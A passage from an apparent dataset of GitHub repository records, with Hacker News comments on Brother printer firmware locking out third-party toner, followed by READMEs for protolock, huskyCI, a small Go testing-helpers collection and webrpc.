\u00a350 multifunction brother or canon printers with separate ink cartridges and fake ink for a \u00a31 a cartridge. Wore the heads out in about five years, repeat. Now they seem to have disappeared, all the cheap canons have combined colour ink cartridges not separate. A colour laser multifunction is expensive and may have pricey toner too. People here seem to like the Epson Ecotanks but the reviews say they struggle on anything but thin paper. The canons megatank look a bit better but still \u00a3200 for a fairly basically built printer. You really need wifi for airprint as its not clear that OSX will have much usb printer support in future. Which leaves you paying \u00a3250 for something like a G650 megatank Canon. I partly blame the home printer market shrinking due to everyone going paperless but suddenly being faced with paying more for a printer than I did for my desktop PC is irritating. (I did suggest a basic laser but everyone said nooo we need colour and copying).Is there a printer that isn't a proprietary ink dispensing jail?I'm with current knowledge and tech it should be possible to print your own printer?Why hasn\u2019t the printer industry not been disrupted by a company that isn\u2019t hell-bent on fucking over their customers?Hmm, I have a new Brother color laser printer standing here with two batches of non-brother (I refuse to say non-genuine) toner. Kind of wonder how that will go when my printer included toner runs out\u2026My pretty old DCP-L2540DW has a new firmware update:06/16/2022 Main: V / Sub: 1.06\nImprovement to help with the performance of the machine.I think I'll pass.I wonder if this is an actual crime = vandalising your printer. 
It is not the inferiority of the ink = make prints bad consequentially, they are taking command and making it act against your best interest.\nGotta be class action in there...It's like if Catbert moved to Evil Printing Solutions from Evil Human Resources.We need laws to prevent such malicious practices. Currently most if not all printer vendors sell printers at loss hoping to claw it back by sell consumables at extremely high prices. Given such background, vendors have more than enough motivation to undermine 3rd party consumables if not totally lock them out.An alternative viewpoint is that this business model is good for consumers, or a least differently neutral.If printer companies try to make their money on the printer sale, then it's very difficult for folks who only need to print a little now and again, and they might not be able to afford a very good printer. By moving to a consumption-based revenue model, now they can let everyone have a super-cheap printer (they are MUCH cheaper than decades ago, despite inflation), and then the people who use the printer more (get more value from it) pay more, and those who don't pay less.This seems reasonable, even though I also don't like hardware that bricks itself if I don't use as directed.Buy an EPSON. Apart from the fact they have separate ink cartridges for each colour, they also don't act like satan.https://www.mimeo.com/blog/destroying-office-printer/I would recommend people who are looking for not only printers, but most kinds of equipment (except for cases where new stuff is unambiguously better than old stuff, but this is rare) to buy used professional/industrial hardware instead of new consumer equipment. And if this is difficult try to look for old consumer hardware still in good shape. These are often of much better quality and also it is much less wasteful to something used than new.Professional equipment is usually in another league than consumer stuff when it comes to quality and reliability and also usually has very low resale value so you can get it for quite cheap. Personally I just picked up an old Sharp color laser printer for about 90$. This is a great machine that prints 2 sided A3 (very hard to find for laser printers) and with toners that should last about 10000 pages which is way better than anything you can buy as a consumer. The only backside is that it is quite big and heavy.Old consumer equipment that is in good shape is often a good deal with the main reasoning being that something that has lasted for a long time has a higher probability of continuing to last a long time compared to something new where it is hard to say how long it will last.Oh noWow, if this comment is to be believed, the quality of Brother printers has seriously gone downhill:https://www.reddit.com/r/printers/comments/s9b2eg/brother_mf...Incredible.I'm old enough to remember buying a mouse and having to install the driver that came with the mouse on a floppy disk. Once the mouse market agreed to a single interface standard (and again when USB mice appeared) the world got simpler. Any computer you could buy would just work with whatever mouse you happened to plug into it. You only needed a custom driver if your mouse had lots of extra buttons that no-one really needed.I'm a little surprised that the same thing didn't happen to printers. I could imagine around 2005, Microsoft including a generic printer driver with Windows XP. 
This way, you could plug in any printer and it would just work, as long as the printer implemented that generic printing protocol, even if it were alongside their own printer interface.Plug in printer. Windows detects device with generic printer interface. User prints document. Document comes out. User happy.Oh sure, the printer would come with a CD that includes software that enables the \"special features\" of the printer. Digital cameras did this too. (Rule #1 of buying a digital camera: Throw away the CD that comes in the box. Break the CD just in case you're tempted that something on CD might fix some trivial issue you're having.)At the same time, I'm not surprised that never happened. Those \"special features\", like shouting at you for buying the wrong ink, are just way too important to not have installed on people's computers.I've got a HL series color laser that I'm otherwise happy with. The firmware version is reported as 1.34. I guess I just have to take care to never upgrade that, and make a mental note never to buy another Brother product again?I predict the next device to go all bonkers with subscriptions and pay-per-use etc is cars.There would be a day when you have to spend $$$ to use air conditioning even though the entire hardware for that is in there.Disappointing. I am on my second Brother HL series laser printer. They've been great for me. Fast cheap printing and readily available 3rd party toner and drums.The first one I got it in 2010 and I purchased a 2nd in 2018 when the first stopped working. I would have kept using the original if it were possible to repair it. I would have also paid more than the $80 sticker priceAnother data point: I have been using a Brother inkjet multifunctional printer with high-capacity ink cartridges for ~five years now, it has no problems with third party ink, and it has worked perfectly from day one. My home office is apparently quite challenging for an inkjet printer, because it's located directly under the roof, so temperatures can get quite high in the summer, which the Epson printer I had before couldn't handle - it constantly had white lines in the printouts. No problem with the Brother.Bummer, I\u2019ve been a fan of Brother in the past. Owned two monochrome laser printers that have been great over 10 years of service with not a single paper jam.I can't wrap my head around how the printer market has turned into this absolutely dispicable, foul state that it is in right now.Decades of innovation that have been invested, not to make a better product, but mostly on how to extract more and more money from their victims, I mean \"customers\".I would like to own a printer again, but for printing something like once a month, I just can't financially justify spending several hundred bucks on a device that might, at the whim of the manufacturer, decide that the way I'm using it is not okay anymore, is probably designed to break after two years, requires me to sign up for a subscription service for ink, or whatever BS else the decision makers in this space come up with.Ugh. This is bad news. I've used Brother B&W lasers at home for the past 20 years, and they've been great. 
(I'm 5 years into my second one, because when the rollers wore out on my first one, 15 years in, I decided I'd rather have the iOS printing features they offered on their newer models instead of sourcing new rollers and taking it apart to change them.)Between their BrScript and their no-BS networking, they were the last I know of to work with no fuss with all the machines I own. On everything other than the iDevices, it's nothing more than a PPD install.I hope this isn't accurate.Thanks for heads up I was considering of upgrading to a Brother model that scans to PDF. Now I won\u2019t.That is unfortunate, I have had good luck with the 2 I have owned over the last fifteen years. They had a toner window that I\u2019d have to cover with tape to avoid toner low messages, but that is the extent of their games.Well that's just awful. I own 2 Brother printers because I thought their management wasn't garbage like HP. I don't know what I'll do when one breaks.You have to get an antique laser like an Apple IInt. New stuff is garbage.Almost 40 years ago RMS, the guy people love to hate, created the Free/Libre software movement and a proprietary printer firmware was one of his motivations.For 40 years this guy has been talking about the perils of proprietary software and people gave a shit to him.Today people not only strongly defend proprietary software, but they think he is a moron, and even free/libre software activists think proprietary firmwares are okay as long their hardware works as expected.Of course this is okay until their hardware stops to work as intended and you are locked out because the proprietary firmware, which usually is what happens.Time for an open hardware printer manufacturer? Or more lobbying for right-to-third-party-ink protection (including not making the quality worse) ?At the same time many other brands are improving. I've seen ink tank based printers from HP and Epson lately, probably more brands. It's a shame Brother is going this way though because they were so great for a long timeWould you be interested in getting a laser printer? I have a Brother and it works very well. It doesn't come with a huge toner cartridge but I'm still on the starter and it's been more than 5 years. Honestly I don't print super often, but it's a nice to have thing. The build quality is also good. It's a bit of a pain to set up, but once done it \"just works\".You may want to add \"Tell HN\" to your title.My Canon MFC742cdw has been complaining about me using the original toner far beyond its \"useful lifetime\". I lost count, but it must have been at least 200 pages ago and it's still printing just fine. Kind of sad that we need to learn to put up with this kind of dark patterns.Buy a KyoceraPerhaps it's time to ban printers and printing. Let's make it all digital!Soon they'll have a hidden 5G Internet connection that sends all printed material to the manufacturer, who will then sell the data to advertisers and the state.Are there still any new printers (postscript, laser) that are reasonable? Black and white printing is sufficient.This is very disappointing to hear. 
Brother were the one bright spot in the printer industry and I'm so much happier since I switched my business to using a Brother colour laser.They've probably recruited one of the bright spark MBA execs that \"revolutionised\"[1] the other manufactures with this kind of rent seeking crap.You know that deal, trade a firm's reputation for quality for a short term boost in profits, bank the bonus and move to another job before the chickens come home to roost. :(1. By revolutionised I of course mean ruined.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "nilslice/protolock", "link": "https://github.com/nilslice/protolock", "tags": ["protocol-buffers", "protoc", "protobuf", "tools", "productivity", "cli", "golang", "proto-files"], "stars": 516, "description": "Protocol Buffer companion tool. Track your .proto files and prevent changes to messages and services which impact API compatibility.", "lang": "Go", "repo_lang": "", "readme": "# protolock\n\nTrack your .proto files and prevent changes to messages and services which impact API compatibility.\n\n[![CircleCI](https://circleci.com/gh/nilslice/protolock/tree/master.svg?style=svg)](https://circleci.com/gh/nilslice/protolock/tree/master)\n[![GoDoc](https://img.shields.io/badge/godoc-reference-blue.svg?style=flat)](https://godoc.org/github.com/nilslice/protolock)\n\n## Why\n\nEver _accidentally_ break your API compatibility while you're busy fixing problems? You may have forgotten to reserve the field number of a message or you re-ordered fields after removing a property. Maybe a new team member was not familiar with the backward-compatibility of Protocol Buffers and made an easy mistake.\n\n`protolock` attempts to help prevent this from happening.\n\n## Overview\n\n1. **Initialize** your repository: \n\n $ protolock init\n # creates a `proto.lock` file\n\n3. **Add changes** to .proto messages or services, verify no breaking changes made: \n\n $ protolock status\n CONFLICT: \"Channel\" is missing ID: 108, which had been reserved [path/to/file.proto]\n CONFLICT: \"Channel\" is missing ID: 109, which had been reserved [path/to/file.proto]\n\n2. **Commit** a new state of your .protos (rewrites `proto.lock` if no warnings): \n\n $ protolock commit\n # optionally provide --force flag to disregard warnings\n\n4. 
**Integrate** into your protobuf compilation step: \n\n $ protolock status && protoc -I ...\n\nIn all, prevent yourself from compiling your protobufs and generating code if breaking changes have been made.\n\n**Recommended:** commit the output `proto.lock` file into your version control system\n\n## Install\nIf you have [Go](https://golang.org) installed, you can install `protolock` by running:\n\n- Go >= 1.17:\n\n\t```bash\n\tgo install github.com/nilslice/protolock/cmd/protolock@latest\n\t```\n\n- Go < 1.17:\n\n\t```bash\n\tgo get github.com/nilslice/protolock/cmd/protolock\n\t```\n\nOtherwise, download a pre-built binary for Windows, macOS, or Linux from the [latest release](https://github.com/nilslice/protolock/releases/latest) page.\n\n## Usage\n```\nprotolock [options]\n\nCommands:\n\t-h, --help, help\tdisplay the usage information for protolock\n\tinit\t\t\tinitialize a proto.lock file from current tree\n\tstatus\t\t\tcheck for breaking changes and report conflicts\n\tcommit\t\t\trewrite proto.lock file with current tree if no conflicts (--force to override)\n\nOptions:\n\t--strict [true]\t\tenable strict mode and enforce all built-in rules\n\t--debug\t[false]\t\tenable debug mode and output debug messages\n\t--ignore \t\tcomma-separated list of filepaths to ignore\n\t--force [false]\t\tforces commit to rewrite proto.lock file and disregards warnings\n\t--plugins \t\tcomma-separated list of executable protolock plugin names\n\t--lockdir [.]\t\tdirectory of proto.lock file\n\t--protoroot [.]\t\troot of directory tree containing proto files\n\t--uptodate [false]\tenforce that proto.lock file is up-to-date with proto files\n```\n\n## Related Projects & Users\n- [Apache Ozone](https://github.com/apache/ozone)\n- [Fanatics](https://github.com/fanatics)\n- [Salesforce](https://github.com/salesforce/proto-backwards-compat-maven-plugin)\n- [Istio](https://github.com/istio/api)\n- [Lyft](https://github.com/lyft)\n- [Envoy](https://github.com/envoyproxy)\n- [Netflix](https://github.com/Netflix)\n- [VMware](https://github.com/vmware/hamlet)\n- [Storj](https://github.com/storj/storj)\n- [Token.io](https://github.com/tokenio/merchant-proxy)\n- [Openbase](https://github.com/openbase/type)\n- [Zeebee](https://github.com/zeebe-io/zeebe)\n\n## Rules Enforced\n\n#### No Using Reserved Fields\nCompares the current vs. updated Protolock definitions and will return a list of \nwarnings if any message's previously reserved fields or IDs are now being used \nas part of the same message.\n\n#### No Removing Reserved Fields\nCompares the current vs. updated Protolock definitions and will return a list of \nwarnings if any reserved field has been removed. \n\n**Note:** This rule is not enforced when strict mode is disabled. \n\n\n#### No Changing Field IDs\nCompares the current vs. updated Protolock definitions and will return a list of \nwarnings if any field ID number has been changed.\n\n\n#### No Changing Field Types\nCompares the current vs. updated Protolock definitions and will return a list of \nwarnings if any field type has been changed.\n\n\n#### No Changing Field Names\nCompares the current vs. updated Protolock definitions and will return a list of \nwarnings if any message's previous fields have been renamed. \n\n**Note:** This rule is not enforced when strict mode is disabled. \n\n#### No Removing Fields Without Reserve\nCompares the current vs. 
updated Protolock definitions and will return a list of \nwarnings if any field has been removed without a corresponding reservation of \nthat field name or ID.\n\n#### No Removing RPCs\nCompares the current vs. updated Protolock definitions and will return a list of \nwarnings if any RPCs provided by a Service have been removed. \n\n**Note:** This rule is not enforced when strict mode is disabled. \n\n#### No Changing RPC Signature\nCompares the current vs. updated Protolock definitions and will return a list of \nwarnings if any RPC signature has been changed while using the same name.\n\n---\n\n## Docker \n\n```sh\ndocker pull nilslice/protolock:latest\ndocker run -v $(pwd):/protolock -w /protolock nilslice/protolock init\n```\n\n---\n\n## Plugins\nThe default rules enforced by `protolock` may not cover everything you want to \ndo. If you have custom checks you'd like run on your .proto files, create a \nplugin, and have `protolock` run it and report your warnings. Read the wiki to \nlearn more about [creating and using plugins](https://github.com/nilslice/protolock/wiki/Plugins).\n\n---\n\n## Contributing\nPlease feel free to make pull requests with better support for various rules, \noptimized code and overall tests. Filing an issue when you encounter a bug or\nany unexpected behavior is very much appreciated. \n\nFor current issues, see: [open issues](https://github.com/nilslice/protolock/issues)\n\n---\n\n## Acknowledgement\n\nThank you to Ernest Micklei for his work on the excellent parser heavily relied upon by this tool and many more: [https://github.com/emicklei/proto](https://github.com/emicklei/proto)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "globocom/huskyCI", "link": "https://github.com/globocom/huskyCI", "tags": ["vulnerabilities", "continuous-integration", "golang", "python", "javascript", "ruby-on-rails", "static-analysis", "security-automation", "gosec", "brakeman", "bandit", "safety", "npm-audit", "yarn-audit", "gitlab-ci", "security-tools", "hacktoberfest", "hacktoberfest2022"], "stars": 517, "description": "Performing security tests inside your CI", "lang": "Go", "repo_lang": "", "readme": "

\n\n## Introduction\n\nhuskyCI is an open source tool that orchestrates security tests and centralizes all results into a database for further analysis and metrics. It can perform static security analysis in Python ([Bandit][Bandit] and [Safety][Safety]), Ruby ([Brakeman][Brakeman]), JavaScript ([Npm Audit][NpmAudit] and [Yarn Audit][YarnAudit]), Golang ([Gosec][Gosec]), Java ([SpotBugs][SpotBugs] plus [Find Sec Bugs][FindSec]), and HCL ([TFSec][TFSec]). It can also audit repositories for secrets like AWS Secret Keys, Private SSH Keys, and many others using [GitLeaks][Gitleaks].\n\n## How does it work?\n\nDevelopers can set up a new stage into their CI pipelines to check for vulnerabilities:\n\n

\n\nIf security issues are found in the code, the severity, the confidence, the file, the line, and many more useful information can be shown, as exemplified:\n\n```\n[HUSKYCI][*] poc-python-bandit -> https://github.com/globocom/huskyCI.git\n[HUSKYCI][*] huskyCI analysis started! yDS9tb9mdt4QnnyvOBp3eVAXE1nWpTRQ\n\n[HUSKYCI][!] Title: Use of exec detected.\n[HUSKYCI][!] Language: Python\n[HUSKYCI][!] Tool: Bandit\n[HUSKYCI][!] Severity: MEDIUM\n[HUSKYCI][!] Confidence: HIGH\n[HUSKYCI][!] Details: Use of exec detected.\n[HUSKYCI][!] File: ./main.py\n[HUSKYCI][!] Line: 7\n[HUSKYCI][!] Code:\n6\n7 exec(command)\n8\n\n[HUSKYCI][!] Title: Possible hardcoded password: 'password123!'\n[HUSKYCI][!] Language: Python\n[HUSKYCI][!] Tool: Bandit\n[HUSKYCI][!] Severity: LOW\n[HUSKYCI][!] Confidence: MEDIUM\n[HUSKYCI][!] Details: Possible hardcoded password: 'password123!'\n[HUSKYCI][!] File: ./main.py\n[HUSKYCI][!] Line: 1\n[HUSKYCI][!] Code:\n1 secret = 'password123!'\n2\n3 password = 'thisisnotapassword' #nohusky\n4\n\n[HUSKYCI][SUMMARY] Python -> huskyci/bandit:1.6.2\n[HUSKYCI][SUMMARY] High: 0\n[HUSKYCI][SUMMARY] Medium: 1\n[HUSKYCI][SUMMARY] Low: 1\n[HUSKYCI][SUMMARY] NoSecHusky: 1\n\n[HUSKYCI][SUMMARY] Total\n[HUSKYCI][SUMMARY] High: 0\n[HUSKYCI][SUMMARY] Medium: 1\n[HUSKYCI][SUMMARY] Low: 1\n[HUSKYCI][SUMMARY] NoSecHusky: 1\n\n[HUSKYCI][*] The following securityTests were executed and no blocking vulnerabilities were found:\n[HUSKYCI][*] [huskyci/gitleaks:2.1.0]\n[HUSKYCI][*] Some HIGH/MEDIUM issues were found in these securityTests:\n[HUSKYCI][*] [huskyci/bandit:1.6.2]\nERROR: Job failed: exit code 190\n```\n\n## Getting Started\n\nYou can try huskyCI by setting up a local environment using Docker Compose following [this guide](https://huskyci.opensource.globo.com/docs/development/set-up-environment).\n\n## Documentation\n\nAll guides and the full documentation can be found in the [official documentation page](https://huskyci.opensource.globo.com/docs/quickstart/overview).\n\n## Contributing\n\nRead our [contributing guide](https://github.com/globocom/huskyCI/blob/master/CONTRIBUTING.md) to learn about our development process, how to propose bugfixes and improvements, and how to build and test your changes to huskyCI.\n\n## Communication\n\nWe have a few channels for contact, feel free to reach out to us at:\n\n- [GitHub Issues](https://github.com/globocom/huskyCI/issues)\n- [Gitter](https://gitter.im/globocom/huskyCI)\n- [Twitter](https://twitter.com/huskyCI)\n\n## Contributors\n\nThis project exists thanks to all the [contributors]((https://github.com/globocom/huskyCI/graphs/contributors)). You rock! 
\u2764\ufe0f\ud83d\ude80\n\n## License\n\nhuskyCI is licensed under the [BSD 3-Clause \"New\" or \"Revised\" License](https://github.com/globocom/huskyCI/blob/master/LICENSE.md).\n\n[Bandit]: https://github.com/PyCQA/bandit\n[Safety]: https://github.com/pyupio/safety\n[Brakeman]: https://github.com/presidentbeef/brakeman\n[Gosec]: https://github.com/securego/gosec\n[NpmAudit]: https://docs.npmjs.com/cli/audit\n[YarnAudit]: https://yarnpkg.com/lang/en/docs/cli/audit/\n[Gitleaks]: https://github.com/zricethezav/gitleaks\n[SpotBugs]: https://spotbugs.github.io\n[FindSec]: https://find-sec-bugs.github.io\n[TFSec]: https://github.com/liamg/tfsec\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "benbjohnson/testing", "link": "https://github.com/benbjohnson/testing", "tags": [], "stars": 516, "description": "A small collection of functions for Go testing.", "lang": "Go", "repo_lang": "", "readme": "Testing Functions for Go\n========================\n\nBelow is a small collection of testing functions for Go. You don't need to import this as a dependency. Just copy these to your project as needed.\n\nNo, seriously. They're tiny functions. Just copy them.\n\n\n```go\nimport (\n\t\"fmt\"\n\t\"path/filepath\"\n\t\"runtime\"\n\t\"reflect\"\n\t\"testing\"\n)\n\n// assert fails the test if the condition is false.\nfunc assert(tb testing.TB, condition bool, msg string, v ...interface{}) {\n\tif !condition {\n\t\t_, file, line, _ := runtime.Caller(1)\n\t\tfmt.Printf(\"\\033[31m%s:%d: \"+msg+\"\\033[39m\\n\\n\", append([]interface{}{filepath.Base(file), line}, v...)...)\n\t\ttb.FailNow()\n\t}\n}\n\n// ok fails the test if an err is not nil.\nfunc ok(tb testing.TB, err error) {\n\tif err != nil {\n\t\t_, file, line, _ := runtime.Caller(1)\n\t\tfmt.Printf(\"\\033[31m%s:%d: unexpected error: %s\\033[39m\\n\\n\", filepath.Base(file), line, err.Error())\n\t\ttb.FailNow()\n\t}\n}\n\n// equals fails the test if exp is not equal to act.\nfunc equals(tb testing.TB, exp, act interface{}) {\n\tif !reflect.DeepEqual(exp, act) {\n\t\t_, file, line, _ := runtime.Caller(1)\n\t\tfmt.Printf(\"\\033[31m%s:%d:\\n\\n\\texp: %#v\\n\\n\\tgot: %#v\\033[39m\\n\\n\", filepath.Base(file), line, exp, act)\n\t\ttb.FailNow()\n\t}\n}\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "webrpc/webrpc", "link": "https://github.com/webrpc/webrpc", "tags": ["webrpc", "json", "webapps", "code-generation", "golang", "typescript", "rpc", "api", "rest"], "stars": 515, "description": "webrpc is a schema-driven approach to writing backend services for modern Web apps and networks", "lang": "Go", "repo_lang": "", "readme": "\"webrpc\"\n\nwebrpc is a schema-driven approach to writing backend servers for the Web. Write your server's\nAPI interface in a schema format of [RIDL](./_examples/golang-basics/example.ridl) or [JSON](./_examples/golang-basics/example.webrpc.json),\nand then run `webrpc-gen` to generate the networking source code for your server and client apps. From the schema,\n`webrpc-gen` will generate application base class types/interfaces, JSON encoders, and networking code. In doing\nso, it's able to generate fully functioning and typed client libraries to communicate with your server. 
Enjoy\nstrongly-typed Web services and never having to write an API client library again.\n\nUnder the hood, webrpc is a Web service meta-protocol, schema and code-generator tool for\nsimplifying the development of backend services for modern Web applications.\n\n- [Getting started](#getting-started)\n- [Code generators](#code-generators)\n- [Quick example](#quick-example)\n - [Example apps](#example-apps)\n- [Why](#why)\n- [Design / architecture](#design--architecture)\n- [Schema](#schema)\n- [Development](#development)\n - [Building from source](#building-from-source)\n - [Writing your own code-generator](#writing-your-own-code-generator)\n- [Authors](#authors)\n- [Credits](#credits)\n- [License](#license)\n\n# Getting started\n\n1. Install [webrpc-gen](https://github.com/webrpc/webrpc/releases)\n2. Write+design a [webrpc schema file](./_examples/golang-basics/example.ridl) for your Web service\n3. Run the code-generator to create your server interface and client, ie.\n - `webrpc-gen -schema=example.ridl -target=golang -pkg=service -server -client -out=./service/proto.gen.go`\n - `webrpc-gen -schema=example.ridl -target=typescript -client -out=./web/client.ts`\n4. Implement the handlers for your server -- of course, it can't guess the server logic :)\n\nanother option is to copy the [hello-webrpc](./_examples/hello-webrpc) example, and adapt for your own webapp and server.\n\n# Code generators\n\n| Generator | Description | Schema | Client | Server |\n|--------------------------------------------------------|-----------------------|--------|--------|--------|\n| [golang](https://github.com/webrpc/gen-golang) | Go 1.16+ | v1 | \u2705 | \u2705 |\n| [typescript](https://github.com/webrpc/gen-typescript) | TypeScript | v1 | \u2705 | \u2705 |\n| [javascript](https://github.com/webrpc/gen-javascript) | JavaScript (ES6) | v1 | \u2705 | \u2705 |\n| [openapi](https://github.com/webrpc/gen-openapi) | OpenAPI 3.x (Swagger) | v1 | \u2705 [*](https://github.com/swagger-api/swagger-codegen#overview) | \u2705 [*](https://github.com/swagger-api/swagger-codegen#overview) |\n\n..contribute more! [webrpc generators](./gen/) are just Go templates (similar to [Hugo](https://gohugo.io/templates/) or [Helm](https://helm.sh/docs/chart_best_practices/templates/)).\n\n# Quick example\n\nHere is an example webrpc schema in RIDL format (a new documentation-like format introduced by webrpc)\n\n```\nwebrpc = v1\n\nname = your-app\nversion = v0.1.0\n\nstruct User\n - id: uint64\n - username: string\n - createdAt?: timestamp\n\nstruct UsersQueryFilter\n - page?: uint32\n - name?: string\n - location?: string\n\nservice ExampleService\n - Ping()\n - Status() => (status: bool)\n - GetUserByID(userID: uint64) => (user: User)\n - IsOnline(user: User) => (online: bool)\n - ListUsers(q?: UsersQueryFilter) => (page: uint32, users: []User)\n```\n\nGenerate webrpc Go server+client code:\n\n```\nwebrpc-gen -schema=example.ridl -target=golang -pkg=main -server -client -out=./example.gen.go\n```\n\nand see the generated `./example.gen.go` file of types, server and client in Go. 
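\n\nAs a rough illustration of the remaining step -- implementing the handlers yourself -- here is a hedged sketch of a hand-written `main.go` that could sit next to the generated file. The `ExampleService` interface, the method signatures, and the `NewExampleServiceServer` constructor below are assumptions inferred from the schema above, not verbatim `webrpc-gen` output; check the generated `example.gen.go` for the real names.\n\n```go\npackage main\n\nimport (\n\t\"context\"\n\t\"log\"\n\t\"net/http\"\n)\n\n
// exampleService implements the ExampleService interface that webrpc-gen is\n// assumed to have written into ./example.gen.go (package main in this example).\ntype exampleService struct{}\n\nfunc (s *exampleService) Ping(ctx context.Context) error { return nil }\n\nfunc (s *exampleService) Status(ctx context.Context) (bool, error) { return true, nil }\n\n
func (s *exampleService) GetUserByID(ctx context.Context, userID uint64) (*User, error) {\n\t// look the user up in your datastore here\n\treturn &User{}, nil\n}\n\nfunc (s *exampleService) IsOnline(ctx context.Context, user *User) (bool, error) {\n\treturn false, nil\n}\n\n
func (s *exampleService) ListUsers(ctx context.Context, q *UsersQueryFilter) (uint32, []*User, error) {\n\treturn 1, []*User{}, nil\n}\n\nfunc main() {\n\t// the generated constructor is assumed to wrap the implementation in an http.Handler\n\thandler := NewExampleServiceServer(&exampleService{})\n\tlog.Fatal(http.ListenAndServe(\":3000\", handler))\n}\n```\n\n
Only these method bodies are hand-written; the routing, JSON encoding/decoding, and the matching client come from the generated code.\n\n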
This is essentially\nhow the [golang-basics](./_examples/golang-basics) example was built.\n\n\n## Example apps\n\n| Example | Description |\n|------------------------------------------------|-----------------------------------------------|\n| [hello-webrpc](./_examples/hello-webrpc) | Go server <=> Javascript webapp |\n| [hello-webrpc-ts](./_examples/hello-webrpc-ts) | Go server <=> Typescript webapp |\n| [golang-basics](./_examples/golang-basics) | Go server <=> Go client |\n| [golang-nodejs](./_examples/golang-nodejs) | Go server <=> Node.js (Javascript ES6) client |\n| [node-ts](./_examples/node-ts) | Node.js server <=> Typescript webapp client |\n\n# Why\n\n**TLDR;** it's much simpler + faster to write and consume a webrpc service than traditional approaches\nlike a REST API or gRPC service.\n\n 1. Code-generate your client libraries in full -- never write another API client again\n 2. Compatible with the Web. A Webrpc server is just a HTTP/HTTPS server that speaks JSON, and thus\n all existing browsers, http clients, load balancers, proxies, caches, and tools work\n out of the box (versus gRPC). cURL \"just works\".\n 3. Be more productive, write more correct systems.\n\n---\n\nWriting a Web service / microservice takes a lot of work and time. REST is making me tired.\nThere are many pieces to build -- designing the routes of your service, agreeing on conventions\nfor the routes with your team, the request payloads, the response payloads, writing the actual server\nlogic, routing the methods and requests to the server handlers, implementing the handlers, and\nthen writing a client library for your desired language so it can speak to your Web\nservice. Yikes, it's a lot of work. Want to add an additional field or handler? yea, you\nhave to go through the entire cycle. And what about type-safety across the wire?\n\nwebrpc automates a lot the work for you. Now from a single [webrpc schema file](./schema/README.md),\nyou can use the `webrpc-gen` cli to generate source code for:\n* Strongly-typed request / response data payloads for your target language\n* Strongly-typed server interface and methods on the service, aka the RPC methods\n* Complete client library to communicate with the web service\n\n\n# Design / architecture\n\nwebrpc services speak JSON, as our goals are to build services that communicate with webapps.\nWe optimize for developer experience, ease of use and productivity when building backends\nfor modern webapps. However, webrpc also works great for service<->service communication,\nbut it won't be as fast as gRPC in that scenario, but I'd be surprised to hear if for the majority\nof cases that this would be a bottleneck or costly tradeoff.\n\nwebrpc is heavily inspired by gRPC and Twirp. It is architecturally the same and has a similar\nworkflow, but simpler. In fact, the webrpc schema is similar in design to protobuf, as\nin we have messages (structs) and RPC methods, but the type system is arguably more flexible and\ncode-gen tooling is simpler. The [webrpc schema](./schema/README.md) is a documentation-like\nlanguage for describing a server's api interface and the type system within is inspired by Go,\nTypescript and WASM.\n\nWe've been thinking about webrpc's design for years, and were happy to see gRPC and Twirp\ncome onto the scene and pave the way with some great patterns. 
Over the years and after writing\ndozens of backends for Javascript-based Webapps and native mobile apps, and even built prior\nlibraries like [chi](https://github.com/go-chi/chi), a HTTP router for Go -- we asked ourselves: \n\nWhy have \"Rails\" and \"Django\" been such productive frameworks for writing webapps? And the answer\nwe came to is that its productive because the server and client are the same program,\nrunning in the same process on the same computer. Rails/Django/others like it, when rendering\nclient-state can just call a function in the same program, the client and the server\nare within the same domain and same state -- everything is a function-call away. Compare this to\nmodern app development such as writing a React.js SPA or a native iOS mobile app, where the app\nspeaks to an external API server with now the huge added effort to bridge data/runtime from\none namespace (the app) to an entirely other namespace (the server). It's too much work and\ntakes too much time, and is too brittle. There is a better way! instead of writing the code..\njust generate it. If we generate all of the code to native objects in both app/server,\nsuddenly, we can make a remote service once again feel like calling a method on the same\nprogram running on the same computer/process. Remote-Procedure-Call works!\n\nFinally, we'd like to compare generated RPC services (gRPC/Twirp/webrpc/other) to the most\ncommon pattern to writing services by \"making a RESTful API\", where the machinery is similar\nto RPC services. Picture the flow of data when a client calls out to a server -- from a client\nruntime proxy-object, we encode that object, send it over the wire, the server decodes it into\na server runtime proxy-object, the server handler queries the db, returns a proxy object,\nencodes it, and sends the function return data over the wire again. That is a ton of work,\nespecially if you have to write it by hand and then maintain robust code in both the client and\nthe server. Ahh, I just want to call a function on my server from my app! Save yourself the work\nand time, and code-generate it instead - Enter gRPC / Twirp .. and now, webrpc :) \n\n\nFuture goals/work:\n1. Add RPC streaming support for client/server\n2. More code generators.. for Rust, Python, ..\n\n# Schema\n\nThe webrpc schema type system is inspired by Go and TypeScript, and is simple and flexible enough\nto cover the wide variety of language targets, designed to target RPC communication with Web\napplications and other Web services.\n\nHigh-level features:\n\n * RIDL, aka RPC IDL, aka \"RPC interface design language\", format - a documentation-like schema\n format for describing a server application.\n * JSON schema format is also supported if you prefer to write tools to target webrpc's code-gen tools\n * Type system inspired by Go + Typescript\n * integers, floats, byte, bool, any, null, date/time\n * lists (multi-dimensional arrays supported too)\n * maps (with nesting / complex structures)\n * structs / objects\n * optional fields, default values, and pluggable code-generation for a language target\n * enums\n\nFor more information please see the [schema readme](./schema/README.md).\n\n\n# Development\n\n## Building from source\n\n1. Install Go 1.16+\n2. $ `go get -u github.com/webrpc/webrpc/...`\n3. $ `make build`\n4. $ `make test`\n5. 
